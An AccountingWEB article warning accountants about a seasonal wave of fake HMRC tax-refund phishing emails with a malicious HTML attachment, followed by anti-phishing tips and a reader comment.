The eternal phishing alert

Phishers never sleep. Just as normal site traffic increases leading up to Self Assessment deadline day and at other cyclical times in the tax calendar, our spam filters regularly pick up seasonal surges in phishy-smelling messages supposedly coming from HMRC.

In the past week, a lot of the messages have been headed “Notice of Tax Return for Year 2011” and promise refunds of £209.87. They’ve got the HMRC logo and a telltale attachment “Tax Return Form.htm” that recipients are urged to fill in to claim their cash windfall.

Instead of the signature of HMRC officer John Cook, the message might have well been signed by an officer of the Intercontinental Bank of Lagos, so obvious is its malicious intent. If you do open one of these emails, or similar phishing attempts, hover your mouse pointer over the attachment and look at the address to which it's pointing. If it comes up with a dodgy domain name, do not click on it.


Anti-phishing tips

• If you get an email requesting any kind of personal or business information, take one or more of the following steps:

• Ignore the message

• Delete the message

• Do not click on any links in the message

• Do not click on any attachments that accompany the message

• Do not reply to the e-mail

• Contact the sender via their own website or public telephone number (NOT anything listed in the email message) if you want to check they really did sent it

• If the message comes from HMRC, report it to forward it to HMRC phishing@hmrc.gsi.gov.uk then delete it.                                       

According to Bitdefender, the tax rebate scam message is a clever one. Not only does it exploit the rather sizable number of rebates that started going out last week (reportedly 3m, thanks to the unravelling of the PAYE code backlog), the attachment form doesn’t direct users to a dodgy website, but downloads to their PC and opens in their local browser, bypassing the usual security blocks on their machine.

All of the mainstream filtering services, including ours, are well tuned to these sorts of approaches, but for those who don’t have server-based protection, it’s a sad fact that even after all these years of education we still need to educate users not to be tempted to open attachments in emails from unexpected sources.

As we have seen with the recent phishing attempts purportedly from HMRC, not to mention AccountingWEB.co.uk and its sister site AccountingWEB.com, phishing attacks are getting more sophisticated and will often disguise themselves as coming from trusted sources.

With spam rates running at 95% of total emails sent, it has become a serious drain on resources. Filtering can cost thousands a year in software and updates along, and the sheer volume of incoming mail requires extra hardware to process. For end-users, the downside of online communication is eternal vigilance, as the small percentage of plausible phishing messages that do get through can still cause serious damage.

Even AccountingWEB editor John Stokdyk, who claims to be technologically aware, has been caught out and confessed a year or so ago to being tricked by one of these “spoofed” messages.

There’s little more we, or HMRC can do other than continue to repeat the advice we have always given. Now, repeat after me: “I must not open dodgy email attachments. I must not open dodgy email attachments…”

Comments

Re:above

Paul Brady | | Permalink

We have had several people come to us having fallen for this scam.
Not really sure what can be done for them. Once the information is out, it is out.

It is also reported here  http://fakeletters.org/scam-emails/notice-of-tax-return .. it seems It seems quiet a few people have fallen for it

Add comment
Log in or register to post comments